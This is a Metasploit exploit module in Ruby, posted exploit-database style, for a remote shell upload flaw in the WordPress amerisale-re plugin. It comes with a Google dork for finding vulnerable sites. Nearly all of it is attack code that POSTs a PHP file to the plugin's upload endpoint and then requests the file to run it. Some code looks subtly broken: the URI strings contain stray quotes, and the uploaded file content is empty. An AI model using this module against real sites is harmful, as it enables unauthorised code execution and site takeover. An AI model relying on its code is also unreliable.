# Exploit Title : Wordpress amerisale-re Remote Shell Upload # Exploit Author : T3rm!nat0r5 # Vendor Homepage : http://wordpress.org/ # Google Dork : inurl:/wp-content/plugins/amerisale-re # Date : 2014/01/30 # Tested on : Windows 8 , Linux # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress amerisale-re Plugin Remote Shell Upload', 'Description' => %q{ This module exploits an arbitrary PHP File Upload and Code Execution flaw in some WordPress blog software plugins. The vulnerability allows for arbitrary file upload and remote code execution POST Data to Vulnerable Script/File in the plugin. }, 'Author' => [ 'T3rm!nat0r5 [Forever]' ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 999999 }, 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0, )) register_options( [ OptString.new('Target', [true, "Wordpress Path", "/"]), OptString.new('PLUGIN', [true, "Full path of Plugin and Vulnerable File", "/"]), OptString.new('UDP', [true, "File Upload Path", "/"]) ], self.class) end def check uri = datastore['Target'] plug = datastore['PLUGIN'] res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{plug}" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = datastore['Target'] plug = datastore['PLUGIN'] path = datastore['UDP'] peer = "#{rhost}:#{rport}" post_data = Rex::MIME::Message.new post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"") print_status("#{peer} - Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}'/'#{plug}", 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/ print_error("#{peer} - File wasn't uploaded, aborting!") return end print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}'/'#{path}'/'#{$1}.php" }) if res and res.code != 200 print_error("#{peer} - Server returned #{res.code.to_s}") end end end # Exploit by T3rm!nat0r5